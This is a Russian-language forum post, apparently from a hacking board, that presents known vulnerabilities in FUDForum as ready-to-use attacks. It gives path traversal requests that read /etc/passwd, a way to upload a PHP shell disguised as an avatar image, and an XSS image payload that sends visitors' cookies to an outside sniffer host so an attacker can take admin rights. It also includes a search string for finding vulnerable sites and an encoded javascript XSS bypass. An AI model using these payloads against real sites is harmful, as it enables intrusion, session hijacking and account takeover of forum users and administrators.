[Обзор] Уязвимости FUDForum Офф. Сайт www.fudforum.org Актуальная версия 2.7.7 Исходники Скачать Уязвимость в admbrowse.php Уязвимость в admbrowse.php позволяет просматривать произвольные файлы Code: admbrowse.phpdown=1&cur=%2Fetc%2F&dest=passwd&rid=1&S=[someid] FUD Forum 2.7.1 PHP code injection vurnelability Возможность залить вместо аватара PHP скрипт, для этого соедините аватар с PHP файлом. Под linux/unix Code: cat foo.png foo.php > upload_me.php В win в простом Notepad. Уязвимость в tmp_view.php Уязвимость позволяет просматривать произвольные файлы. Code: /tmp_view.php?file=/etc/passwd Кража cookie Берём картинку, с названием 1.jpg Открываем блокнотом. И вставляем в картинку допустим: Code: <html> <head> <script>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> </head> </html> После вставки в сообщение будет ссылка наподобии этой: Code: http://forum.site.ru/index.php?t=getfile&id=2723&private=0 или так нагляднее: Code: http://forum.site.ru/index.php?t=getfile&id=2723 После открытия этой ссылки произойдёт кража куков пользователей. ****** Далее идем сюда: Code: http://old.antichat.ru/sniff/log.php И вставляем куки себе. И получаем права аминистратора. Для поиска: Code: Powered by: FUDforum 2.7.4 XSS На некоторых версиях при отключённых картинках, подписях и т.д. есть возможность провести XSS в отправке сообщения: Code: [img=javascript:alert('bugs!');]Бага[/img] В слове javascript букву t нужно заменить на код & # 116 ; без пробелов. (c)